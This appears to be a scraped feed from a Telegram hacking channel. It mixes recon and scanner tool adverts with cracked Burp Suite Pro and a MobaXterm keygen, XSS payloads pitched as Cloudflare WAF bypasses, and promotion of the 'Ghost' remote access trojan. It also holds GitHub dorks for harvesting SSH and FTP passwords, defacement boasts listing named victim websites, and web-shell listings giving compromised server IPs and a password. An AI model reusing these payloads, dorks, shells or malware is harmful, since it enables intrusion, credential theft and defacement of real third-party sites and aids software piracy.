💙 Burpsuite Pro 💙

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👻 steghide 👻

💬
Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.

💡
Steghide is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data.

🕸 Steghide is useful in digital forensics investigations.

🔼 Install:
👩‍💻 Kali:

sudo apt install steghide

⬇️ Download (windows)
🔒 BugCod3

#Steghide #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 ExifTool 🕷

💬
Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

📊
The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:

⚪️ Archive::Zip / libarchive-zip-perl: ZIP, DOCX, PPTX,
XLSX, ODP, ODS, ODT, EIP, iWork

⚪️ Unicode::LineBreak / libunicode-linebreak-perl: for column-alignment of alternate language output

⚪️ POSIX::strptime / libposix-strptime-perl: for inverse date/time conversion

⚪️ Time::Piece (in perl core): alternative to POSIX::strptime

⚪️ IO::Compress::RawDeflate + IO::Uncompress::RawInflate (in perl core): for reading FLIF images

⚪️ Compress::Raw::Lzma / libcompress-raw-lzma-perl: for reading encoded 7z files

⚪️ IO::Compress::Brotli + IO::Uncompress::Brotli / libio-compress-brotli-perl: for writing/reading compressed JXL metadata

🔼 Install:
👩‍💻 Kali:

sudo apt install libimage-exiftool-perl

⬇️ Download 🔟👩‍💻👩‍💻
🔒 BugCod3

#Steghide #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦊 DalFox 🦊

💬
DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

🔼 Install:

go install github.com/hahwul/dalfox/v2@latest

💻 Usage:

dalfox [mode] [target] [flags]

👤 Single target mode:

dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
  -b https://your-callback-url

👥 Multiple target mode from file:

dalfox file urls_file --custom-payload ./mypayloads.txt

🪟 Pipeline mode:

cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"

😸 Github

⬇️ Donwload
🔒 BugCod3

#Go #XSS #Scanner #Vulnerability #BugBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

#XSS #Payload #Bypass #CF #WAF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👣 haktrails 👣

💬
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

📊 Tool Features:
⚪️ stdin input for easy tool chaining
⚪️ subdomain discovery
⚪️ associated root domain discovery
⚪️ associated IP discovery
⚪️ historical DNS data
⚪️ historical whois data
⚪️ DSL queries (currently a prototype)
⚪️ company discovery (discover the owner of a domain)
⚪️ whois (returns json whois data for a given domain)
⚪️ ping (check that your current SecurityTrails configuration/key is working)
⚪️ usage (check your current SecurityTrails usage)
⚪️ "json" or "list" output options for easy tool chaining
⚪️ "ZSH & Bash autocompletion"

🔼 Installation:

go install -v github.com/hakluke/haktrails@latest

💻 Usage:

Gather subdomains

cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

😸 Github

⬇️ Download
🔒 BugCod3

#Go #Subdomain #IP #Discovery
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Main sinks that can lead to DOM-XSS

#Javacript #Dom #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦎 Subprober 🦎

🔔 Subprober v1.0.5 - Fast Probing Tool for Penetration Testing

👁‍🗨 Overview:
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.

📊 Features:
⚪️ Subprober Concurrency and Accuracy are Improved with libraries like aiohttp,asyncio
⚪️ Subprober Error handling and Synchronization are improved
⚪️ Resolved some Bugs for Subprober
⚪️ Subprober Commands are changed with usefull flags
⚪️ Resolved executive errors in v1.0.4
⚪️ Subprober requires python version 3.11.x

🔼 Installation:
Method 1:

pip install git+https://github.com/sanjai-AK47/Subprober.git

Method 2:

cd Subprober
pip install .

💻 Basic Usage:

subprober -f subdomains.txt -o output.txt -tl -wc -sv  -apt -wc -ex 500 -v -o output.txt -c 20

😸 Github

⬇️ Download
🔒 BugCod3

#Subdomains #Scanner
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👻 Ghost 👻

👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

💬
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

👁‍🗨
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:

zombie.exe 127.0.0.1 27015

📊 Features:
⚪️ Remote command execution
⚪️ Silent background process
⚪️ Download and run file (Hidden)
⚪️ Safe Mode startup
⚪️ Will automatically connect to the server
⚪️ Data sent and received is encrypted (substitution cipher)
⚪️ Files are hidden
⚪️ Installed Antivirus shown to server
⚪️ Easily spread malware through download feature
⚪️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
⚪️ Disable Task Manager

😸 Github

⬇️ Download
🔒 BugCod3

#Rat #Malware #Remote #Access
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 hakip2host 🕷

💬
hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.

📊 Current supported checks are:
⚪️ DNS PTR lookups
⚪️ Subject Alternative Names (SANs) on SSL certificates
⚪️ Common Names (CNs) on SSL certificates

🔼 Installation:

go install github.com/hakluke/hakip2host@latest

💻 Usage:

hakip2host --help

😸 Github

⬇️ Download
🔒 BugCod3

#Osint #Recon #CIDR #HTTPS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Burpsuite Pro 👁

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🌐 Bypass login authentication 🌐

⬇️ Download
🔒 BugCod3

#Bypass #Login #Page #Authentication
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🫥 MobaXterm Keygen 🔘

⚠️ Please see source code. It is not complex. ⚠️

I don't know how to make custom settings take effect in Customizer mode directly.

💬
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

📊 Postscript:
⚪️ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

⚪️ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

⚪️ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".

./MobaXterm.exe -customizer

💻 Usage:

./MobaXterm-Keygen.py "DoubleSine" 10.9

😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #MobaXterm #Keygen #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔑 LEAKEY 🔑

LEAKEY is a bash script which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

💬
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The script is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

👤 Requirements:
⚪️ jq

🔼 Installation:

curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh

💻 Usage:
After running the installation command, simply run the below in your terminal

leaky

📊 Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json

{
    "id": 0,
    "name": "Slack API Token",
    "args": [
      "token"
    ],
    "command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
  }

😸 Github

⬇️ Download
🔒 BugCod3

#RedTeam #BugHunter #Leaked #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site
👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [🇸🇬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link
pwd: bugcod3

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://fnsir.ru/
https://dzhakkolo.fnsir.ru/index.html
https://kerling.fnsir.ru/index.html
https://kornhol.fnsir.ru/index.html
https://krokinol.fnsir.ru/index.html
https://novus.fnsir.ru/index.html
https://shafflbord.fnsir.ru/index.html
https://worldnovuss.com/index.html

👁‍🗨 Mirror-h

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/

👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit